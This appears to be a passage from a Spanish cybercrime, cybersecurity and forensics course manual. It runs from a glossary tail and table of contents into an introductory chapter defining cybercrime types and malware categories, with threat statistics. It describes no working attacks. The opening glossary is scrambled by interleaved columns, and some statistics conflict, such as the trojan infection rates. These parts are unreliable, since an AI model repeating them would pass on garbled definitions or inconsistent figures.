privacidad de los usuarios, así como la
grabados por el remitente haciendo
integridad de sus datos.
uso de dispositivos informáticos.
STALKING:
SISTEMA:
Es la situación que se crea, cuando
Conjunto de elementos físicos y lógicos
una persona persigue a otra de forma
que se encargan de recibir, guardar y
obsesiva.
procesar datos para luego entregarlos
en forma de resultados. El esquema de
un sistema informático engloba todo
SUPLANTACIÓN DE IDENTIDAD:
aquello que contiene una parte tangible
(hardware) y otra lógica (software). Persona que usurpa totalmente la
identidad de otra, durante un tiempo
prologando y engañando a terceros,
SKIMMING: para obtener algún beneficio económico
o causar un perjuicio a terceros.
Acto fraudulento en el que un skimmer
coloca un pequeño dispositivo en un TABLETA:
lector de tarjetas real para capturar
Es un tipo de computadora portátil, de
la información de cualquier tarjeta de
mayor tamaño que un Smartphone
crédito.
o una PDA, integrado en una pantalla
SOFTWARE: táctil (sencilla o multitáctil) con la que
se interactúa primariamente con los
Al equipo lógico o soporte lógico de un
dedos, sin necesidad de teclado físico
sistema informático, que comprende el
ni ratón.
conjunto de los componentes lógicos
necesarios que hacen posible la TARJETA SIM:
realización de tareas específicas.
Modulo de identificación del suscritor,
SOPORTE DIGITAL: viene en diferentes presentaciones, SIM,
NANO y MICRO-SIM.
Medio de almacenamiento físico donde
se guarda o exporta la información TRATAMIENTO DE EVIDENCIA DIGITAL:
extraída de la evidencia por parte del
Comprende varias etapas por las que
perito de informática forense.
pasa la evidencia digital, surge luego
de la adquisición de una imagen

forense, o de la preservación de VERIFICACIÓN:
información, pasando por una etapa
Función que se utiliza para verificar que
de procesamiento y análisis, finalizando
dos conjuntos de datos son idénticos.
con un reporte de las actividades
realizadas. VIOLENCIA DIGITAL:
TROJAN HORSE Toda aquella acción que mediante
medios digitales acose, amenace o
O troyano. Tipo de software malicioso
extorsione a cualquier individuo.
que se “disfraza” para ocultar sus
verdaderas intenciones. Se basa en WORM:
descargas automáticas, explotación
de vulnerabilidades, descarga por Es un programa malicioso (o malware)
otro código malicioso o técnicas de que tiene como característica principal
su alto grado de «dispersabilidad», es
ingeniería social.
decir, lo rápidamente que se propaga.
UNIDAD TRANSITORIA DE INDICIOS: Mientras que los troyanos dependen
de que un usuario acceda a una web
Lugar donde se almacenan
maliciosa o ejecute un fichero infectado,
temporalmente las evidencias, en
los gusanos realizan copias de sí
condiciones ambientales y de seguridad
mismos, infectan a otras computadoras
que permitan garantizar la preservación
y se propagan automáticamente en
e integridad de los mismos.
una red independientemente de la
VALOR HASH: acción humana. Su fin es replicarse
a nuevos sistemas para infectarlos y
Cadena de bits que es la salida de una
seguir replicándose a otros equipos
función hash.
informáticos, aprovechándose de
VALIDACIÓN: todo tipo de medios como el correo
electrónico, IRC, FTP, correo electrónico,
Confirmación, mediante la aportación P2P y otros protocolos específicos o
de pruebas objetivas, de que se cumplen ampliamente utilizados.
los requisitos para un uso o aplicación
específicos previstos.
VALIDEZ DE LA PRUEBA:
Es un indicador de la cantidad de
significado que se puede atribuir a un
conjunto de resultados de una prueba.
VENTA DE NIÑOS:
Todo acto o transacción en virtud del
cual un niño es transferido por una
persona o grupo de personas a otra a
cambio de remuneración o de cualquier
otra retribución.

INDICE
CIBERCRIMEN
1. Introducción a la Ciberdelincuencia. Tipologías del

ciberdelito ........................................................................................... 26
1.1. Introducción............................................................................................................................................................. 26
1.2. Aproximación conceptual............................................................................................................................ 29
2. Enfoque criminológico de la víctima del ciberdelito.................44

2.1. Concepto y objeto de la victimología.................................................................................................. 44
2.2. Definición de víctima.....................................................................................................................................47
2.3. Victimización y desvictimización. Concepto y clases de victimización......................49
2.4. Victimización primaria, secundaria y terciaria........................................................................... 53
2.5. Revictimización................................................................................................................................................... 56
2.6. La cibervíctima................................................................................................................................................... 57
3. Prevención, intervención y persecución estratégica. .............60

3.1. Introducción...........................................................................................................................................................60
3.2. Dificultades para la lucha contra el cibercrimen...................................................................... 62
3.3. Prevención del ciberdelito........................................................................................................................... 62
3.4. Organigrama de la delincuencia organizada..............................................................................64
4. Perfil delincuencial del cibercrimen............................................65

4.1. Los hackers............................................................................................................................................................. 65
4.2. Cibercriminal económico ...........................................................................................................................68
4.3. El cibercriminal social ................................................................................................................................... 72
CIBER SEGURIDAD
1. La seguridad de la información .....................................................77

1.1. La seguridad de la información implica confidencialidad,
integridad y disponibilidad................................................................................................................................... 77
1.2. La seguridad es un proceso........................................................................................................................84
1.3. La clasificación de la información.........................................................................................................86
1.4. La seguridad se articula con controles de seguridad............................................................88
1.5. La seguridad en la información implica la gestión de los riesgos................................89
1.6. La seguridad es tanto física como lógica .......................................................................................90
1.7. La seguridad implica a las personas................................................................................................... 91
1.8. Seguridad de la información y gestión de riesgos. .................................................................. 91
1.9. Política de Seguridad de la Información......................................................................................... 95
2. Gobernanza y buenas prácticas de la seguridad de

lainformación....................................................................................... 96
2.1. Gobierno de la seguridad de la información..................................................................................96
2.2. Buenas prácticas de seguridad en la gestión de servicios de TI...................................99
3. El estándar ISO 27001..................................................................... 104
4. Modelos de madurez para la seguridad de la información ..109

4.1. Programas de gestión de la seguridad .............................................................................................111
4.2. La gestión de riesgos ....................................................................................................................................112
4.3. Diseño de políticas de seguridad ........................................................................................................ 114
5.La ISO 27005:2011 y su adaptación al NIS SP 800-30..................117

5.1. ISO/IEC 27005:2018........................................................................................................................................... 117
5.2. NIST 80-30 Rev. 1.................................................................................................................................................121

6. Seguridad en redes. Identificación de amenazas y vectores de
ataque.................................................................................................. 127
6.1. Aspectos avanzados de TCP/IP..............................................................................................................127
6.2. Modelo de seguridad OSI.......................................................................................................................... 129
6.3. Ataques a la seguridad............................................................................................................................... 130
6.4. Servicios y mecanismos de seguridad. ...........................................................................................133
6.5. Modelos de seguridad en redes............................................................................................................ 138
6.6. Evaluación de riesgos de las Tecnologías de la Información ......................................... 139
7. Detección y análisis de vulnerabilidades................................. 148

7.1. OWASP Top ten ................................................................................................................................................148
7.2. OWASP Top Ten 2013: otras vulnerabilidades importantes ............................................. 168
7.3. Análisis de seguridad de las aplicaciones web ......................................................................... 171
7.4. Análisis de seguridad estático de código fuente .....................................................................172
7.5. Análisis de seguridad funcional y dinámico ............................................................................... 176
8. Herramientas de seguridad: IDS/IPS- DLP. PROXY y SIEM .......182

8.1. Sistemas de detección y prevención de intrusos..................................................................... 182
8.2. Sistemas trampa ........................................................................................................................................... 185
8.3. Funcionamiento práctico: Snort ......................................................................................................... 189
8.4. Sistemas de prevención de fugas de datos (DLP).................................................................... 193
8.5. Servidores Proxy ..............................................................................................................................................194
8.6. Gestores de Eventos de Seguridad (SIEM).................................................................................... 195
8.7. Funcionamiento práctico: Squid ........................................................................................................ 196
9. Blockchain, criptografía y seguridad de datos........................ 207

9.1. Cifrado simétrico ............................................................................................................................................ 207
9.2. Funciones hash ...............................................................................................................................................212
9.3. Cifrado asimétrico ..........................................................................................................................................215

10. Introducción a la seguridad en Windows server y trabajo en
máquinas virtuales........................................................................... 220
10.1. Seguridad en Windows Server............................................................................................................. 220
10.2. Seguridad en Active Directory. Políticas base. .........................................................................221
10.3. Analizadores de políticas base........................................................................................................... 230
10.4. Herramientas de análisis de configuración de seguridad. ............................................231
11. Big Data y Cloud Computing...................................................... 232

11.1. Arquitecturas Big Data...............................................................................................................................232
11.2. Vulnerabilidades y amenazas en big data .................................................................................237
11.3. Seguridad y privacidad en big data ................................................................................................ 241
11.4. Redes Virtuales ................................................................................................................................................251
11.5. Identity and Access Management ....................................................................................................252
11.6. Seguridad en la nube como servicio (Secaas) ..........................................................................255
11.7. Componentes de Azure .............................................................................................................................255
11.8. Azure Active Directory ............................................................................................................................... 259
11.9. Administración de usuarios y grupos en Azure AD .............................................................. 261
11.10. Configuración y administración ....................................................................................................... 270
NORMATIVAS Y PROTOCOLOS
INTERNACIONALES
1. Normativa Tecnológica – Digital Internacional........................ 275

1.1. La Unión Internacional de Telecomunicaciones .......................................................................275
1.2. Internet Society.................................................................................................................................................. 276
1.3. Internet Architecture Board (IAB)......................................................................................................... 276
1.4. Internet Engineering Task Force (EITF)............................................................................................. 277
1.5. Internet Engineering Steering Group (IESG)................................................................................. 277
1.6. Internet Assigned Number Authority (IANN)................................................................................ 278

1.7. Corporación de Internet para la Asignación de Nombres y Números (ICANN).. 278
1.8. World Wide Web Consortium (W3C)..................................................................................................280
2.Tipología delictiva en cibercrimen. .............................................281

2.1. Estafas en la banca electrónica. Phishing...................................................................................... 281
2.2. Otros tipos de fraude en la red..............................................................................................................300
2.3. Fraude en medios de pago físico.......................................................................................................... 316
2.4. Daños informáticos....................................................................................................................................... 326
2.5. Difusión de contenidos ilícitos ................................................................................................................335
2.6. Otros ciberdelitos ........................................................................................................................................... 338
ANÁLISIS FORENSE
1. Introducción al Análisis Forense I.............................................. 345

1.1. Primera aproximación al análisis forense informático. ....................................................... 345
1.2. Evidencia digital y artefactos.................................................................................................................. 345
2. Introducción al análisis forense II............................................... 376

2.1. Introducción a las infraestructuras Cloud ...................................................................................376
2.2. Definición y características de la nube...........................................................................................376
2.3. Tipos de cloud....................................................................................................................................................377
2.4. Servicios de cloud computing................................................................................................................ 378
2.5. Riesgos asociados a la cloud................................................................................................................. 379
2.6. Seguridad lógica y física........................................................................................................................... 381
2.7. Análisis forense en Cloud ......................................................................................................................... 382
2.8. Estrategias de análisis forense en cloud....................................................................................... 382
2.9. Fases del análisis forense en cloud...................................................................................................384
2.10. Herramientas de análisis forense en cloud................................................................................388
2.11. Análisis forense en IoT.................................................................................................................................388
2.12. Internet of Things........................................................................................................................................... 389
2.13. Incidentes relacionados con IoT..........................................................................................................390

2.14. Análisis forense en dispositivos IoT..................................................................................................... 391
2.15. Informes de análisis forense ................................................................................................................. 392
2.16. Contenido del informe y marcos de referencia.........................................................................393
2.17. Estructura de un informe forense: Índice general.................................................................394
2.18. Estructura del informe: Memoria...................................................................................................... 395
2.19. Estructura del informe: Anexos........................................................................................................... 395
2.20. Herramientas forenses............................................................................................................................. 396
2.21. Recuperación de ficheros....................................................................................................................... 396
2.22. Análisis de procesos................................................................................................................................... 397
2.23. Análisis y recolección de logs.............................................................................................................. 398
2.24. Análisis forense de red............................................................................................................................. 399
2.25. Wireshark......................................................................................................................................................... 400
2.26. Análisis de imágenes.................................................................................................................................401
3.El Laboratorio Pericial ...................................................................402

3.1. Principios multidisciplinares del análisis forense....................................................................402
3.2. Cadena de custodia de la evidencia física y digital..............................................................405
3.3. La cadena de custodia de la evidencia digital.........................................................................406
3.4. Modelo de documento: Cadena de custodia de la evidencia digital ......................409
3.5. Fotografía forense..........................................................................................................................................410
3.6. Recolección y registro de evidencia digital.................................................................................. 412
3.7. Elementos básicos y suplementarios................................................................................................ 416
3.8. Equipo de campo...........................................................................................................................................420
3.9. Configuración de un PC Analista.......................................................................................................420
3.10. Normativas aplicables a la gestión del laboratorio............................................................... 421
3.11. Gestión interna de un laboratorio...................................................................................................... 421
4. Proceso del análisis forense.......................................................424

4.1. Esquema general de un análisis forense......................................................................................424
4.2. Fase de pre – análisis.................................................................................................................................. 425
4.3. Fase de análisis................................................................................................................................................ 431

5. Sistemas operativos y análisis forense..................................... 437
5.1. Análisis de un S.O. Windows................................................................................................................... 437
5.2. Análisis de un S.O. Linux............................................................................................................................ 452
5.3. Análisis de un S.O. MacOS........................................................................................................................462
6. Gestión efectiva de la cadena de custodia ............................. 469

6.1. Concepto...............................................................................................................................................................469
6.2. Protocolos internos de Policía Científica....................................................................................... 473
6.3. ¿Qué elementos se incluyen en el documento de cadena de custodia?.............. 476
6.4. Cadena de custodia de la evidencia digital............................................................................... 477
6.5. Clasificación de la evidencia digital................................................................................................. 478
6.6. Usos de la evidencia digital.................................................................................................................... 479
6.7. Manipulación de la evidencia digital............................................................................................... 479

CIBER
CRIMEN

1. Introducción a la
Ciberdelincuencia.
Tipologías del ciberdelito
1.1. Introducción
Es muy novedoso el fenómeno de la delincuencia relacionada con el uso de las TIC, aunque
hace más de 30 años que se empezó a hablar de delitos informáticos y 20 años que se
acuñó el término ciberdelito. Aunque el desarrollo de la tecnología informática comenzó
a lo largo en las décadas de 1960 y 1970, con la creación de Internet y su generalización
posterior, pero la velocidad a la que han surgido nuevas tecnologías en los últimos años
ha aumentado exponencialmente.
El impacto social que marca la revolución de las TIC también es evidente: gracias a la
llegada de Internet y su expansión global, nos hemos acercado mucho a la idea de crear
un ciberespacio virtual. William Gibson acuñó el término cuando configuró un espacio de
comunicación e interacción paralelo al mundo físico.
Gracias a esta revolución de internet, especialmente a partir de 2010, las relaciones
económicas, política, social y sobre todo personal han cambiado. De hecho, es bastante
evidente que hoy en día, las redes de telefonía móvil e internet son la forma más común
de comunicarnos en cualquier entorno, ya sea laboral o personal.
Además, lo accesible de las redes hace que los niños, niñas y adolescentes estén
constantemente expuestos a estas, e interacciones con las TIC de forma habitual.
• Por último, es importante destacar que hoy en día la mayoría de las

relaciones comerciales se realizan a través de la red, así como los
bancos y las entidades financieras actúan por este medio, lo que
supone que el grueso de las transacciones económicas se suceda a
través de las TIC.
Como puede verse en la siguiente imagen extraída de “Estudios sobre hábitos en el uso
del efectivo 2022” realizado por el Banco de España, el 44% de la población dispone de
bizum, siendo utilizado diariamente por el 1% de la población.

Ilustración 1. Medios de pago entre la población
El uso diario de bizum aumenta hasta un 5% en la población de entre 18 y 24 años, mientras

que el uso de efectivo disminuye hasta el 43% lo que nos adelanta la perspectiva que se
va a seguir:
Ilustración 2. Uso diario de medios de pago.
Este hecho esta estrictamente relacionado con el nacimiento de los llamados “nativos
digitales” concepto acuñado en 2001 por Marc Prensky para designar a los sujetos
que habían crecido con la red y con el progreso tecnológico. Este concepto describe
a las personas que navegan con fluidez, creando sus propios contenidos y esperando
respuestas instantáneas y resultados inmediatos (Granado, 2019).

Los “nativos digitales” conciben las TIC como forma de trabajo, pero también como forma
de diversión con las redes sociales como forma de interacción social.
Todo este auge de uso de las tecnologías en el día a día ha hecho que surjan nuevas
formas de cometer delito mediante su uso, lo que supone el cibercrimen.
Ilustración 3. Formas de delitos a partir del uso de las tecnologías
La evolución del cibercrimen también conlleva una evolución en sus protagonistas

esenciales, los criminales y las víctimas: del ya mítico hacker estereotipado en el
adolescente introvertido y con problemas de sociabilidad encerrado en su casa y
convertido en el primer ciberespacio en un genio informático capaz de lograr la guerra
entre dos superpotencias solo desde su computadora, a las mafias organizadas de
cibercriminales, que aprovechan el nuevo ámbito para aumentar sus actividades
ilícitas y sus recursos. Y al no ser los cibercrímenes únicamente los realizados con ánimo
económico, también varían los perfiles de cibercriminales que cometen delitos, que no
son más que réplicas en el ciberespacio de los que ejecutarían en el espacio físico.
Y lo mismo sucede con las víctimas. Las empresas siguen siendo objeto de victimización
debido tanto al uso generalizado de las TIC en ellas, como a sus recursos económicos
objeto de deseo por los cibercriminales. Pero la aparición de los cibercrímenes sociales
convierte a cualquier ciudadano que se relacione en Internet, que contacte con otros,
envíe mensajes, charle en foros o comparta sus fotos, en objeto de un ciberataque
personal a su honor, intimidad, libertad sexual o similares bienes jurídicos.
Los ciberdelitos no conocen fronteras. Los delincuentes, las víctimas y las infraestructuras
técnicas están dispersos por múltiples jurisdicciones, lo que resulta muy problemático a
la hora de realizar una investigación o emprender acciones judiciales.
Por tanto, el fenómeno de la criminalidad informática tiene un alcance mayor y puede
abarcar hechos delictivos como fraude, el robo, falsificación y la malversación de
caudales públicos, utilizando equipos informáticos, programas y medios cibernéticos,
internet y redes sociales tal y como se verá a lo largo de este manual. Estos delitos se han
sofisticado y concurrente, pues día con día suceden hechos delictivos informáticos que
perjudican patrimonios de personas.

La justificación es que la informática es cotidiana en todas las áreas de la sociedad y por
ende los avances tecnológicos son de mucha magnitud que influyen en todas las ramas
del derecho, no solo en el derecho penal.
1.2. Aproximación conceptual

Los delitos informáticos son una serie de actividades ilícitas que se cometen mediante el
uso de computadoras, sistemas informáticos, dispositivos electrónicos o de comunicación
y que tienen por objeto causar daños, lucrarse, provocar pérdidas, facilitar un delito, etc.
La cibercriminalidad, por otro lado, tiene un alcance mayor y puede incluir o facilitar delitos
tradicionales como fraudes, chantajes, robos, falsificaciones, malversación de caudales
públicos, etc., en los cuales las computadoras, sistemas o medios informáticos han sido
utilizados como medio para la comisión de la conducta ilícita.
Con la informática o tecnología no solo se cometen los delitos anteriormente mencionados,
sino que puede haber violaciones de derechos de autor, violaciones a la intimidad, a la
propia imagen, delitos de pornografía infantil, pedofilia, violación de secretos, etc.
Son delitos que debido a la utilización de las TIC conllevan investigaciones que van
más allá del delito tradicional, lo que implica una mayor formación, especialización y
conocimiento (Costa, 2012).
Los tipos de cibercrimen existentes se pueden clasificar en dos:
• Delitos ciberdependientes: Un acto que trasgrede la ley, el cual requiere

del uso tecnologías de la información y comunicación para ser cometido.
Dicho acto afecta programas informáticos, plataformas virtuales o el
contenido digital creado, transmitido o almacenado. En este sentido
este acto afecta la confidencialidad, integridad y/o disponibilidad de los
datos y sistemas informáticos. Asimismo, esta clase de actos existen dado
que las tecnologías de la información y comunicación existen. Ejemplos:
hacking, ataques distribuidos de denegación de servicio y distribución de
malware.
• Delitos ciberfacilitados: Un acto que trasgrede la ley, el cual requiere del

uso de tecnologías de la información y comunicación para ser cometido.
Dicho acto afecta seres humanos u otros bienes “no digitales”. En este
sentido, las tecnologías de la información y comunicación no se ven
afectadas en esta clase de actos, aun cuando hayan sido empleadas
para su cometimiento. Asimismo, esta clase de actos existiría aún si no
existiesen las tecnologías de la información y comunicación. Ejemplos:
explotación y abuso sexual en línea, phishing (fraude y estafa en línea) y
difusión en línea de discurso de odio.

Los riesgos y amenazas más comunes son:
• Hacking y/o piratas: Aunque la terminología hacker podría interpretarse

en distintas vertientes, en este apartado se incluye a los que utilizan sus
conocimientos técnicos para atentar contra derechos o cometer delitos.
• Crimen organizado: el anonimato y la rapidez de ejecución hacen del
ciberespacio y especialmente en la Deep web, un escenario perfecto para
el crimen organizado.
• Delincuencia común: La delincuencia común utiliza de forma habitual
el entorno cibernético como escenario de nuevas tipologías delictivas
relacionadas fundamentalmente con ataques al derecho a la intimidad,
falsedades, amenazas, pornografía infantil, pirámides de valor y todo tipo
de timos y estafas.
La realidad criminológica nos enseña, en primer lugar, que el ciberespacio se ha convertido
en algunos casos en un ámbito auténticamente generador de nuevas conductas
delictivas cuando las TIC son la única forma de realización de la infracción; en otros,
en cambio, lo que ha supuesto la irrupción del “nuevo espacio” ha sido la aparición de
nuevas formas de facilitar la delincuencia tradicional.
AMENAZAS INFORMÁTICAS
Según estadísticas recogidas por CERTs a nivel mundial casi un tercio de las computadoras
de todo el mundo, un 31,63 % está infectado con algún tipo de malware. Los troyanos son
los ejemplares de malware más numerosos representando un 16 % de los equipos.
Los últimos años se ha vivido una auténtica revolución en el mundo de la seguridad
informática. La popularización de dispositivos y la creación de nuevos mercados ha
fomentado la aparición de un gran número de amenazas, que de forma constante han
aumentado.
La tendencia de crecimiento de malware en los últimos años ha conseguido que en 2011
se registrase una cantidad total superior a los 86 millones de ejemplares. La gran cantidad
de tipos de malware y la falta de precaución por parte de los usuarios de todo el mundo
ha provocado una alta tasa de infecciones.
Según datos de la infografía de Pandalab, la amenaza de malware más presente son los
troyanos. Se trata de virus que se instalan en los equipos de los usuarios, normalmente
pasando desapercibido, para operar sin su conocimiento. Estos ejemplares de malware
son muy peligrosos y son los más numerosos. El 76,18 por ciento de todo el malware son
troyanos, muy por encima del 7,8 por ciento que son virus y del 6,69 que son gusanos.
La alta presencia de troyanos ha provocado que el 24% de las computadoras esté
infectado con este tipo de malware. A través de los troyanos, los ciberdelincuentes pueden
robar información o controlar los equipos.
Los ataques de Ransomware representan el 79% del total de incidentes en 2020-2021
(según reporte de Sophos) y según el informe de Cybersecurity Ventures se estima que
existió un ataque de ransomware cada 11 segundos para fines del 2021. Esto no incluye
ataques a individuos, que ocurren con mayor frecuencia.

Ilustración 4. Ransomware
El 78% de líderes de seguridad TI creen que sus organizaciones no tienen suficiente

protección contra ciberataques a pesar de las inversiones en ciberseguridad realizadas en
2020 (Insight Enterprise). La I+D es cara, según el Informe de defensa contra ciberamenazas
del CyberEdge Group de 2022 (CDR) las empresas destinan a ciberseguridad poco menos
del 12% de su presupuesto destinado a TI, siendo la media de todos los países analizados
el 12.7%. Es decir, que la rentabilidad de las inversiones (ROI) requerida para financiar
los esfuerzos de programación informática ilegales, que realiza de manera continuada
el crimen organizado internacional, tiene que ser ingente. El 95% del malware pasaba
completamente desapercibido (Goodman, 2015).
En 2022 el 91,8% de las de las organizaciones se vieron comprometidas por uno o más
ataques, el 62 % de las organizaciones sufrieron el impacto de ransomware en 2020,
Australia (79.6%), Estados Unidos (78,5%), Arabia Saudí (77.65), (60%) y Japón (56%) según
el Informe de defensa contra ciberamenazas del CyberEdge Group de 2022 (CDR).
Sophos revela que el coste derivado del ransomware se incrementó un 25 % entre 2020
y 2021. En 2020, las compañías gastaron una media de 600 000 $ como resultado de
ataques de ransomware. Ese valor ascendió a 750 000 $ en 2021.
Todos los atacantes se benefician de la naturaleza asimétrica de la tecnología: el defensor
debe construir una muralla perfecta para bloquear el paso a todos los intrusos, mientras
que el atacante solo precisa encontrar una rendija en la armadura por la que colarse
para perpetrar su asalto.
Entre las facciones que combaten en el ciberespacio se da cooperación, voluntaria e
involuntaria, pues los atacantes suelen aprender e imitar los éxitos operativos recíprocos.
Algunas amenazas informáticas existentes son (Fernández-Reyes, 2016):
Malware: software cuyo propósito es infiltrarse y/o dañar un sistema sin el

consentimiento del propietario. El término “Malicious software” se suele
usar para englobar a todos aquellos programas “maliciosos” (troyanos, virus,
gusanos, etc.) que pretenden obtener un determinado beneficio, causando
algún tipo de perjuicio al sistema informático o al usuario del mismo.
Adware: programa que automáticamente se ejecuta y muestra publicidad

web después de instalar programas.
Hijackers: son programas que realizan cambios en la configuración del

navegador web, cambiando la página de inicio por páginas con publicidad,
pornográficas u otros redireccionamientos con anuncios de pago o páginas
de phishing bancario, o incluso impedir que se pueda ejecutar un antivirus.

Se instalan en forma silenciosa desde sitios de juegos online o similares o
mediante la ejecución de programas que se ofrecen en forma gratuita, que
se han descargado como barras de herramientas, programas para solucionar
algún inconveniente con Windows, etc.
Con esto, las mentes detrás de los hijackers intentan que se visiten páginas que
no deseamos ver para posicionar las mismas mediante el constante tráfico
y la consecuente publicidad asociada al mismo. Con ello, los desarrolladores
de hijakers ganan dinero, aportado generalmente por empresas dedicadas a
obtener clics y visitas de este modo ilícito.
Rogue software: es un programa que hace creer al usuario que la computadora

está infectada por algún tipo de virus u otro tipo de software malicioso, esto
induce al usuario a pagar por un software inútil o a instalar un software malicioso
que supuestamente elimina las infecciones, pero el usuario no necesita ese
software puesto que no está infectado (rogues y fakes). Se denominada Rogue
Software (o también Rogue, Rogueware, FakeAVs, Badware, Scareware) a los
«falsos programas de seguridad» que no son realmente lo que dicen ser, sino
todo lo contrario. Bajo la promesa de solucionar falsas infecciones, cuando el
usuario instala estos programas, su sistema es infectado.
Spywares: son aquellos creados para recopilar información sobre las

actividades realizadas por un usuario, obteniendo datos sobre los sitios
web que visita, direcciones de e-mail a las que después se envía spam. La
mayoría son programas instalados como troyanos. Otros spyware recogen la
información mediante cookies de terceros o barras de herramientas instaladas
en navegadores web. Generalmente se presentan como programas que
muestran publicidad o ventanas emergentes (pop-up) que son aceptadas de
forma involuntaria, afectando los sistemas del usuario.
Drive-by downloads: son sitios que instalan spyware o códigos que dan
información de los equipos. Generalmente se presentan como descargas que,
de algún tipo, se efectúan sin consentimiento del usuario, lo cual ocurre al
visitar un sitio web, al revisar un mensaje de correo o al entrar a una ventana
pop-up.
Clickers: se dedican a visitar anuncios y páginas (normalmente pornográficas)

y simular una visita sobre sus banners, que les reportará algún beneficio. Este
esquema es bien conocido, y afecta al consumo de datos del usuario, pues
la app seguirá realizando peticiones entre bambalinas sin que la víctima sea
consciente.
Web bugs: denominados también «micro espías» o «pulgas» y son imágenes

transparentes (tipo Gif) dentro de una página web o dentro de un correo
electrónico con un tamaño de 1×1 pixeles. Al igual que ocurre con las cookies,
se utilizan para obtener información acerca de los lectores de esas páginas
o los usuarios de los correos, tales como la dirección IP de su computadora,
el tipo y versión de navegador del internauta, el sistema operativo, idioma,
cuánta gente ha leído el correo, etc.
Script kiddie: término despectivo utilizado para describir a aquellos que

utilizan programas y scripts desarrollados por otros para atacar sistemas de
computadores y redes.
Phreaking: es la utilización

fraudulenta de conexiones de voz, imagen o datos, que permite a su autor
evitar tener que afrontar su coste. Hace referencia a la persona que se dedica
a estudiar el funcionamiento de teléfonos de diversa índole, tecnologías de
telecomunicaciones, compañías telefónicas, sistemas que componen una
red telefónica y electrónica aplicada a sistemas telefónicos y puede llegar a
realizar actividades no autorizadas con los teléfonos, por lo general móviles.
Una variante de este tipo sería el wardriving, que es la conexión a través de un
sistema de conexión inalámbrico (wifi) ajeno (Pérez-Vaquero, 2014).
VIRUS INFORMÁTICOS
El virus informático se propaga infectando otro software ejecutable de la misma
computadora. Puede tener un contenido que realice otras acciones maliciosas en donde
se borran archivos. Por tanto, un virus es un archivo ejecutable que desempeña acciones
(dañar archivos, reproducirse, etc. en una computadora sin nuestro consentimiento).
“WORMS” O GUSANOS INFORMÁTICOS

Se distinguen de los virus por la manera en que se propagan. Los gusanos son programas
que se transmiten a sí mismos, explotando vulnerabilidades en una red de computadoras
para infectar otros equipos.
Su principal objetivo es infectar a la mayor cantidad posible de usuarios y también
puede contener instrucciones dañinas al igual que los virus. Los gusanos se propagan
automáticamente, a diferencia de los virus que necesitan la intervención de un usuario.
Entre ellos, se encuentran los siguientes (Fernández-Reyes, 2016):
• Troyanos: software malicioso que permite la administración remota de

una computadora de forma oculta y sin el consentimiento del propietario.
• Juice Jacking: es la infección del cargador del móvil.
• Keyloggers: estos programas están encaminados al aspecto financiero, la
suplantación de personalidad y el espionaje. Los keyloggers monitorizan
todas las pulsaciones del teclado y las almacenan para realizar operaciones
fraudulentas como son pagos desde cuentas de banco o tarjetas de crédito.
La mayoría de estos sistemas son usados para recopilar contraseñas de
acceso, espiar conversaciones de chat u otros fines.
• Ransomwares: son también llamados criptovirus o secuestradores, son
programas que cifran los archivos importantes para el usuario, haciéndolos
inaccesibles, y piden que se pague un «rescate» para poder recibir la
contraseña que permite recuperar los archivos.
• Stealers: también roban información privada, pero solo la que se encuentra
guardada en el equipo. Al ejecutarse comprueban los programas instalados
y, si tienen contraseñas recordadas, por ejemplo, en los navegadores web,
las descifran.

ATAQUES INFORMÁTICOS
Entre los ataques más comunes figuran, entre otros (Fernández-Reyes, 2016):
• Defacement: es una palabra inglesa que significa desfiguración y es un

término usado en informática para hacer referencia a la deformación o
cambio producido de manera intencionada en una página web.
• Rootkit: es un conjunto de herramientas que sirven para esconder los
procesos y archivos que permiten al intruso mantener el acceso al sistema,
por ejemplo, el rootkit puede esconder una aplicación que lance una
consola cada vez que el atacante se conecte al sistema a través de un
determinado puerto.
• Backdoor: permite también que los procesos lanzados por un usuario sin
privilegios de administrador ejecuten algunas funcionalidades reservadas
únicamente al superusuario. Todo tipo de herramientas útiles para obtener
información de forma ilícita pueden ser ocultadas mediante rootkits. Es
un método para eludir los procedimientos habituales de autenticación
al conectarse en una computadora. Una vez que el sistema ha sido
comprometido, puede instalarse una puerta trasera para permitir un
acceso remoto más fácil en el futuro de los atacantes. Es un software que
modifica el sistema operativo de la computadora, para permitir que el
malware permanezca oculto al usuario, evitando que el proceso malicioso
sea visible en el sistema.
• Botnets: son redes de computadoras infectadas, también llamadas
«zombies», que pueden ser controladas a la vez por un individuo y realizan
distintas tareas. Este tipo de redes son usadas para el envío masivo de
spam o para lanzar ataques contra organizaciones. En una botnet cada
computadora está infectada por malware. Las botnets son una colección
de computadoras infectadas con malware y esclavizados que funcionan de
manera simultánea bajo el control de piratas informáticos o delincuentes
con el objetivo de enviar cantidades masivas de mensajes de correo
electrónico no deseado o participar en ataques distribuidos de denegación
de servicio (DDoS) sin el conocimiento del dueño legítimo del dispositivo.
Ahora los delincuentes y piratas informáticos se han apoderado del control
de millones de teléfonos móviles y los han unido a sus «redes zombis», que
crecen de manera exponencial (Goodman, 2015).
Los teléfonos móviles actúan de faros constantes que señalizan nuestras actividades y
nuestra ubicación. Son los dispositivos menos seguros de todos. El software que emplean
es célebre por la facilidad con la que puede vulnerarse, los smartphones figuran entre los
dispositivos más fáciles de piratear. Existen virus y troyanos diseñados específicamente
para brindar a los atacantes acceso al micrófono de tu teléfono móvil y grabar los sonidos
del entorno, incluso aunque no se esté efectuando una llamada.

Ilustración 5. Virus en teléfono móvil
Todo lo que se haga y todo lo que se almacene en un móvil puede ser interceptado,
pirateado y transmitido a organizaciones delictivas para su explotación futura. Los
delincuentes pueden utilizar software malicioso para teléfonos móviles para realizar un
seguimiento de la localización en tiempo real, con la ayuda práctica de un mapa de
Google. Incluso es posible activar la videocámara del teléfono inteligente para grabar
al usuario. El problema radica en el sistema operativo. Los sistemas operativos de los
teléfonos móviles son más nuevos que sus homólogos de sobremesa de toda la vida y
mucho menos seguros. Los delincuentes son plenamente conscientes de que el mundo
de los datos masivos cada vez funciona más en dispositivos móviles y ahí es donde están
concentrando todos sus esfuerzos para garantizarse el mejor retorno por sus inversiones
en software malicioso.
Los móviles son la plataforma predilecta. Son dispositivos personales y siempre los llevan
los usuarios y los delincuentes se adaptan e innovan con celeridad.
De hecho, según el informe del Estado Móvil 2022 que ha publicado la compañía de
análisis App Annie, el uso del teléfono móvil ha crecido un 30 por ciento en el año 2021,
con 4,8 horas al día de media por persona, lo que supone un tercio del tiempo que
pasa despierto cada usuario. Los datos de App Annie muestran también que en 2021 se
produjeron 230.000 millones de descargas de nuevas aplicaciones, un 5 por ciento más
que en 2020, incluyendo los datos de plataformas como iOS, Google Play y terceros. De
media, se descargaron 435.000 aplicaciones por minuto en el mundo.
